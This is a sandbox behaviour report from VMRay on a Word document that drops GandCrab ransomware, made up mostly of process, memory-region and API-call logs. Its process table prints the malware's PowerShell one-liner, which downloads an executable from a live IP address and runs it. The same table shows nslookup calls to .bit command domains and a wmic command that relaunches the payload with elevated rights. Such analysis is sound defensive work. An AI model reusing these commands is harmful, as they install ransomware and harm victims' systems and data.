Doc Dropper - Gandcrab Analysis | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: Windows 10 (64-bit), MS Office 2016 | ms_office
Classification: Dropper, Trojan, Downloader, Ransomware

99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809 (SHA256)

sample_file.doc

Word Document

Created at 2018-04-20 18:19:00

Notifications (2/3)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "1 minute, 10 seconds" to "1 minute, 10 seconds" to reveal dormant functionality.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x1230 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0x11a0 Child Process Medium powershell.exe powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe'); #1
#4 0x5e0 Child Process Medium powershell.exe "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe #2
#6 0xc0c Child Process Medium phfw.exe "C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe" #4
#7 0xdec Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #6
#9 0x10f4 Child Process Medium nslookup.exe nslookup ransomware.bit ns2.corp-servers.ru #6
#11 0x1064 Autostart Medium ibpbzu.exe "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe" -
#12 0x1128 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#14 0x1220 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#16 0x124c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#18 0x135c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#20 0x1068 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#22 0x1100 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#24 0x1120 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#26 0x113c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#28 0xe0c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#31 0x3a4 Child Process High (Elevated) wmic.exe "C:\WINDOWS\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe" #11
#33 0x150 RPC Server System (Elevated) svchost.exe C:\WINDOWS\system32\svchost.exe -k netsvcs #31
#34 0x674 RPC Server System (Elevated) wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding #33
#35 0xf0 Child Process High (Elevated) cmd.exe cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe #34
#37 0x608 Child Process High (Elevated) ibpbzu.exe C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe #35

Behavior Information - Sequential View

Process #1: winword.exe
178 0
»
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:19, Reason: Analysis Target
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:05:27
OS Process Information
»
Information Value
PID 0x1230
Parent PID 0x9f4 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 13D4
0x 13D0
0x 13CC
0x 13C8
0x 13C4
0x 13C0
0x 13BC
0x 1390
0x 1344
0x 131C
0x 12EC
0x 12E8
0x 12E4
0x 12D0
0x 12CC
0x 12C8
0x 12C4
0x 12C0
0x 12BC
0x 12B8
0x 12B0
0x 12A4
0x 1234
0x 13D8
0x 116C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable False False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable False False False -
private_0x0000004072200000 0x4072200000 0x40723fffff Private Memory Readable, Writable False False False -
private_0x0000004072400000 0x4072400000 0x40724fffff Private Memory Readable, Writable False False False -
private_0x0000004072600000 0x4072600000 0x40726fffff Private Memory Readable, Writable False False False -
private_0x0000004072700000 0x4072700000 0x40727fffff Private Memory Readable, Writable False False False -
private_0x0000004072800000 0x4072800000 0x40728fffff Private Memory Readable, Writable False False False -
private_0x0000004072900000 0x4072900000 0x40729fffff Private Memory Readable, Writable False False False -
private_0x0000004072a00000 0x4072a00000 0x4072afffff Private Memory Readable, Writable False False False -
private_0x0000004072b00000 0x4072b00000 0x4072bfffff Private Memory Readable, Writable False False False -
private_0x0000004072c00000 0x4072c00000 0x4072cfffff Private Memory Readable, Writable False False False -
private_0x0000004072d00000 0x4072d00000 0x4072dfffff Private Memory Readable, Writable False False False -
private_0x0000004072e00000 0x4072e00000 0x4072efffff Private Memory Readable, Writable False False False -
private_0x0000004072f00000 0x4072f00000 0x4072ffffff Private Memory Readable, Writable False False False -
private_0x0000004073000000 0x4073000000 0x40730fffff Private Memory Readable, Writable False False False -
private_0x0000004073100000 0x4073100000 0x40731fffff Private Memory Readable, Writable False False False -
private_0x0000004073200000 0x4073200000 0x40732fffff Private Memory Readable, Writable False False False -
private_0x0000004073300000 0x4073300000 0x40733fffff Private Memory Readable, Writable False False False -
private_0x0000004073400000 0x4073400000 0x40734fffff Private Memory Readable, Writable False False False -
private_0x0000004073500000 0x4073500000 0x40735fffff Private Memory Readable, Writable False False False -
private_0x0000004073600000 0x4073600000 0x40736fffff Private Memory Readable, Writable False False False -
private_0x0000004073700000 0x4073700000 0x40737fffff Private Memory Readable, Writable False False False -
private_0x0000004073800000 0x4073800000 0x40738fffff Private Memory Readable, Writable False False False -
private_0x0000004073900000 0x4073900000 0x40739fffff Private Memory Readable, Writable False False False -
private_0x0000004073a00000 0x4073a00000 0x4073afffff Private Memory Readable, Writable False False False -
private_0x0000004073b00000 0x4073b00000 0x4073bfffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb09f0000 0x21fb09f0000 0x21fb09fffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fb0a00000 0x21fb0a00000 0x21fb0a00fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0a10000 0x21fb0a10000 0x21fb0a27fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0a30000 0x21fb0a30000 0x21fb0a33fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0a40000 0x21fb0a40000 0x21fb0a43fff Pagefile Backed Memory Readable False False False -
private_0x0000021fb0a50000 0x21fb0a50000 0x21fb0a50fff Private Memory Readable, Writable False False False -
private_0x0000021fb0a60000 0x21fb0a60000 0x21fb0a66fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb0a70000 0x21fb0a70000 0x21fb0a70fff Pagefile Backed Memory Readable False False False -
private_0x0000021fb0a80000 0x21fb0a80000 0x21fb0a8ffff Private Memory Readable, Writable False False False -
private_0x0000021fb0a90000 0x21fb0a90000 0x21fb0a96fff Private Memory Readable, Writable False False False -
private_0x0000021fb0aa0000 0x21fb0aa0000 0x21fb0aa0fff Private Memory Readable, Writable False False False -
private_0x0000021fb0ab0000 0x21fb0ab0000 0x21fb0ab0fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb0ac0000 0x21fb0ac0000 0x21fb0ac0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb0ad0000 0x21fb0ad0000 0x21fb0bcffff Private Memory Readable, Writable False False False -
locale.nls 0x21fb0bd0000 0x21fb0c94fff Memory Mapped File Readable False False False -
pagefile_0x0000021fb0ca0000 0x21fb0ca0000 0x21fb0ea7fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb0eb0000 0x21fb0eb0000 0x21fb1030fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb1040000 0x21fb1040000 0x21fb243ffff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x21fb2440000 0x21fb2776fff Memory Mapped File Readable False False False -
private_0x0000021fb2780000 0x21fb2780000 0x21fb287ffff Private Memory Readable, Writable False False False -
private_0x0000021fb2880000 0x21fb2880000 0x21fb2880fff Private Memory Readable, Writable False False False -
private_0x0000021fb2890000 0x21fb2890000 0x21fb2890fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb28a0000 0x21fb28a0000 0x21fb28a1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb28b0000 0x21fb28b0000 0x21fb28b1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb28c0000 0x21fb28c0000 0x21fb28c1fff Pagefile Backed Memory Readable False False False -
private_0x0000021fb28d0000 0x21fb28d0000 0x21fb28dffff Private Memory - False False False -
pagefile_0x0000021fb28e0000 0x21fb28e0000 0x21fb28e1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb28f0000 0x21fb28f0000 0x21fb28f1fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2900000 0x21fb2900000 0x21fb2901fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2910000 0x21fb2910000 0x21fb2911fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2920000 0x21fb2920000 0x21fb2921fff Pagefile Backed Memory Readable False False False -
winnlsres.dll 0x21fb2930000 0x21fb2934fff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2940000 0x21fb2940000 0x21fb2941fff Pagefile Backed Memory Readable False False False -
wwintl.dll 0x21fb2950000 0x21fb2a0bfff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2a10000 0x21fb2a10000 0x21fb2a11fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb2a20000 0x21fb2a20000 0x21fb2a20fff Pagefile Backed Memory Readable, Writable False False False -
winnlsres.dll.mui 0x21fb2a30000 0x21fb2a3ffff Memory Mapped File Readable False False False -
msointl30.dll 0x21fb2a40000 0x21fb2a4efff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2a50000 0x21fb2a50000 0x21fb2a50fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb2a60000 0x21fb2a60000 0x21fb2a66fff Private Memory Readable, Writable False False False -
private_0x0000021fb2a70000 0x21fb2a70000 0x21fb2a77fff Private Memory Readable, Writable False False False -
private_0x0000021fb2a80000 0x21fb2a80000 0x21fb2a80fff Private Memory Readable, Writable False False False -
private_0x0000021fb2a90000 0x21fb2a90000 0x21fb2a90fff Private Memory Readable, Writable False False False -
private_0x0000021fb2aa0000 0x21fb2aa0000 0x21fb2aa0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2ab0000 0x21fb2ab0000 0x21fb2ab0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2ac0000 0x21fb2ac0000 0x21fb2ae7fff Private Memory Readable, Writable False False False -
private_0x0000021fb2af0000 0x21fb2af0000 0x21fb2af0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2b00000 0x21fb2b00000 0x21fb2b1ffff Private Memory Readable, Writable False False False -
office.odf 0x21fb2b20000 0x21fb2cd8fff Memory Mapped File Readable False False False -
msointl.dll 0x21fb2ce0000 0x21fb2e5afff Memory Mapped File Readable False False False -
pagefile_0x0000021fb2e60000 0x21fb2e60000 0x21fb2e9bfff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb2ea0000 0x21fb2ea0000 0x21fb2ea0fff Private Memory Readable, Writable False False False -
private_0x0000021fb2eb0000 0x21fb2eb0000 0x21fb2ebffff Private Memory Readable, Writable False False False -
mso40uires.dll 0x21fb2ec0000 0x21fb31c7fff Memory Mapped File Readable False False False -
mso99lres.dll 0x21fb31d0000 0x21fb3af0fff Memory Mapped File Readable False False False -
msores.dll 0x21fb3b00000 0x21fb893efff Memory Mapped File Readable False False False -
pagefile_0x0000021fb8940000 0x21fb8940000 0x21fb89aafff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb89b0000 0x21fb89b0000 0x21fb8a1afff Private Memory Readable, Writable False False False -
private_0x0000021fb8a20000 0x21fb8a20000 0x21fb8c1ffff Private Memory Readable, Writable False False False -
private_0x0000021fb8c20000 0x21fb8c20000 0x21fb8c20fff Private Memory Readable, Writable False False False -
private_0x0000021fb8c30000 0x21fb8c30000 0x21fb8c30fff Private Memory Readable, Writable False False False -
~fontcache-system.dat 0x21fb8c40000 0x21fb8cb3fff Memory Mapped File Readable False False False -
private_0x0000021fb8cc0000 0x21fb8cc0000 0x21fb8dbffff Private Memory Readable, Writable False False False -
~fontcache-s-1-5-21-1051304884-625712362-2192934891-1000.dat 0x21fb8dc0000 0x21fb95bffff Memory Mapped File Readable False False False -
private_0x0000021fb95c0000 0x21fb95c0000 0x21fb99bffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb99c0000 0x21fb99c0000 0x21fb9a72fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb9a80000 0x21fb9a80000 0x21fb9a83fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fb9a90000 0x21fb9a90000 0x21fb9f81fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb9f90000 0x21fb9f90000 0x21fb9f90fff Private Memory Readable, Writable False False False -
private_0x0000021fb9fa0000 0x21fb9fa0000 0x21fb9fa0fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb9fb0000 0x21fb9fb0000 0x21fb9fb0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fb9fc0000 0x21fb9fc0000 0x21fb9fc0fff Private Memory Readable, Writable False False False -
private_0x0000021fb9fd0000 0x21fb9fd0000 0x21fb9fd6fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fb9fe0000 0x21fb9fe0000 0x21fb9fe4fff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fb9ff0000 0x21fb9ff0000 0x21fb9ff0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000021fba000000 0x21fba000000 0x21fba000fff Pagefile Backed Memory Readable False False False -
private_0x0000021fba010000 0x21fba010000 0x21fba01ffff Private Memory Readable, Writable False False False -
r00000000000d.clb 0x21fba020000 0x21fba025fff Memory Mapped File Readable False False False -
private_0x0000021fba030000 0x21fba030000 0x21fba03ffff Private Memory - False False False -
user32.dll.mui 0x21fba040000 0x21fba044fff Memory Mapped File Readable False False False -
private_0x0000021fba050000 0x21fba050000 0x21fba050fff Private Memory Readable, Writable False False False -
msxml6r.dll 0x21fba060000 0x21fba060fff Memory Mapped File Readable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db 0x21fba070000 0x21fba08dfff Memory Mapped File Readable False False False -
private_0x0000021fba090000 0x21fba090000 0x21fba09ffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fba0a0000 0x21fba0a0000 0x21fba89ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fba8a0000 0x21fba8a0000 0x21fba9d1fff Private Memory Readable, Writable False False False -
private_0x0000021fba9e0000 0x21fba9e0000 0x21fbaddffff Private Memory Readable, Writable False False False -
private_0x0000021fbade0000 0x21fbade0000 0x21fbaedffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbaee0000 0x21fbaee0000 0x21fbaee0fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fbaef0000 0x21fbaef0000 0x21fbaef6fff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbaf00000 0x21fbaf00000 0x21fbaf01fff Pagefile Backed Memory Readable False False False -
private_0x0000021fbaf10000 0x21fbaf10000 0x21fbaf10fff Private Memory Readable, Writable False False False -
c_1255.nls 0x21fbaf20000 0x21fbaf30fff Memory Mapped File Readable False False False -
private_0x0000021fbaf40000 0x21fbaf40000 0x21fbaf4ffff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbaf50000 0x21fbaf50000 0x21fbb34ffff Pagefile Backed Memory Readable False False False -
private_0x0000021fbb350000 0x21fbb350000 0x21fbb44ffff Private Memory Readable, Writable False False False -
~fontcache-fontface.dat 0x21fbb450000 0x21fbc44ffff Memory Mapped File Readable False False False -
segoeui.ttf 0x21fbc450000 0x21fbc532fff Memory Mapped File Readable False False False -
d2d1.dll.mui 0x21fbc540000 0x21fbc583fff Memory Mapped File Readable False False False -
private_0x0000021fbc590000 0x21fbc590000 0x21fbcd8ffff Private Memory Readable, Writable False False False -
segoeuil.ttf 0x21fbcd90000 0x21fbce66fff Memory Mapped File Readable False False False -
seguisb.ttf 0x21fbce70000 0x21fbcf55fff Memory Mapped File Readable False False False -
segoeuib.ttf 0x21fbcf60000 0x21fbd03ffff Memory Mapped File Readable False False False -
pagefile_0x0000021fbd040000 0x21fbd040000 0x21fbd04ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fbd050000 0x21fbd050000 0x21fbd05ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fbd060000 0x21fbd060000 0x21fbd06ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fbd070000 0x21fbd070000 0x21fbd47cfff Private Memory Readable, Writable False False False -
private_0x0000021fbd480000 0x21fbd480000 0x21fbd88efff Private Memory Readable, Writable False False False -
private_0x0000021fbd890000 0x21fbd890000 0x21fbdc9dfff Private Memory Readable, Writable False False False -
private_0x0000021fbdca0000 0x21fbdca0000 0x21fbdd1ffff Private Memory Readable, Writable False False False -
private_0x0000021fbdd20000 0x21fbdd20000 0x21fbdf1ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x21fbdf20000 0x21fbf05ffff Memory Mapped File Readable False False False -
pagefile_0x0000021fbf060000 0x21fbf060000 0x21fbf062fff Pagefile Backed Memory Readable False False False -
cversions.2.db 0x21fbf070000 0x21fbf073fff Memory Mapped File Readable False False False -
cversions.2.db 0x21fbf080000 0x21fbf083fff Memory Mapped File Readable False False False -
private_0x0000021fbf090000 0x21fbf090000 0x21fbf0aefff Private Memory Readable, Writable False False False -
pagefile_0x0000021fbf0b0000 0x21fbf0b0000 0x21fbf56cfff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000021fbf570000 0x21fbf570000 0x21fbfa2cfff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000021fbfa30000 0x21fbfa30000 0x21fc09fffff Private Memory Readable, Writable False False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000017.db 0x21fc0a00000 0x21fc0a46fff Memory Mapped File Readable False False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x21fc0a50000 0x21fc0ae1fff Memory Mapped File Readable False False False -
pagefile_0x0000021fc0af0000 0x21fc0af0000 0x21fc0af2fff Pagefile Backed Memory Readable False False False -
private_0x0000021fc0b30000 0x21fc0b30000 0x21fc0b38fff Private Memory Readable, Writable False False False -
private_0x0000021fc0b40000 0x21fc0b40000 0x21fc0b63fff Private Memory Readable, Writable False False False -
For performance reasons, the remaining 328 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x1234
178 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = Unknown module name, base_address = 0x7ff665300000 True 1
Fn
Module Load module_name = Comctl32.dll, base_address = 0x7ff9d2a40000 True 1
Fn
Module Get Handle module_name = Unknown module name, base_address = 0x7ff9ce360000 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7ff9ce4265b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7ff9ce41c070 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7ff9ce428a00 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7ff9ce425a10 True 1
Fn
Module Get Handle module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 False 1
Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7ff9b0150000 True 1
Fn
Environment Get Environment String name = DDRYBUR False 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x21fba9b0000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Licenses True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x7ff9db420000 True 1
Fn
Window Create class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = USER32, base_address = 0x7ff9ddc60000 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetSystemMetrics, address_out = 0x7ff9ddc6f150 True 1
Fn
Module Get Address module_name = Unknown module name, function = MonitorFromWindow, address_out = 0x7ff9ddc68a40 True 1
Fn
Module Get Address module_name = Unknown module name, function = MonitorFromRect, address_out = 0x7ff9ddc67990 True 1
Fn
Module Get Address module_name = Unknown module name, function = MonitorFromPoint, address_out = 0x7ff9ddc66c10 True 1
Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayMonitors, address_out = 0x7ff9ddc939e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMonitorInfoA, address_out = 0x7ff9ddc67e90 True 1
Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayDevicesA, address_out = 0x7ff9ddc81b50 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = oleaut32.dll, base_address = 0x7ff9db420000 True 1
Fn
Module Get Address module_name = Unknown module name, function = DispCallFunc, address_out = 0x7ff9db428de0 True 1
Fn
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7ff9db4303c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7ff9db454020 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7ff9db43b880 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7ff9db431f50 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7ff9db42f5c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7ff9db47bd10 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7ff9db42efd0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7ff9db42df60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7ff9db422190 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7ff9db421eb0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7ff9db481f60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7ff9db421b80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7ff9db481f30 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7ff9db4823b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7ff9db4807c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7ff9db480650 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7ff9db4819e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7ff9db481a50 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7ff9db4819b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7ff9db423700 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7ff9db4226b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7ff9db422c30 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7ff9db481870 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormat, address_out = 0x7ff9db486540 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7ff9db486750 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7ff9db4867d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7ff9db4868e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7ff9db486630 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7ff9db486d20 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMonthName, address_out = 0x7ff9db4869d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAdd, address_out = 0x7ff9db472760 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAnd, address_out = 0x7ff9db475000 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCat, address_out = 0x7ff9db473150 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDiv, address_out = 0x7ff9db4732a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarEqv, address_out = 0x7ff9db475190 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarIdiv, address_out = 0x7ff9db4751c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarImp, address_out = 0x7ff9db475380 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMod, address_out = 0x7ff9db475470 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMul, address_out = 0x7ff9db473930 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarOr, address_out = 0x7ff9db475690 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarPow, address_out = 0x7ff9db474220 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarSub, address_out = 0x7ff9db474450 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarXor, address_out = 0x7ff9db475830 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAbs, address_out = 0x7ff9db471950 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFix, address_out = 0x7ff9db471c40 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarInt, address_out = 0x7ff9db471e40 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNeg, address_out = 0x7ff9db472020 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNot, address_out = 0x7ff9db4755f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarRound, address_out = 0x7ff9db4723b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCmp, address_out = 0x7ff9db436710 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecAdd, address_out = 0x7ff9db4764d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecCmp, address_out = 0x7ff9db421390 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCat, address_out = 0x7ff9db4374a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7ff9db421560 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7ff9db436bd0 True 1
Fn
Module Get Handle module_name = ole32.dll, base_address = 0x7ff9dd150000 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7ff9dd846770 True 1
Fn
Module Get Address module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7ff9dd834b70 True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 2
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 195, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Module Get Address module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7ff9b015f200 True 1
Fn
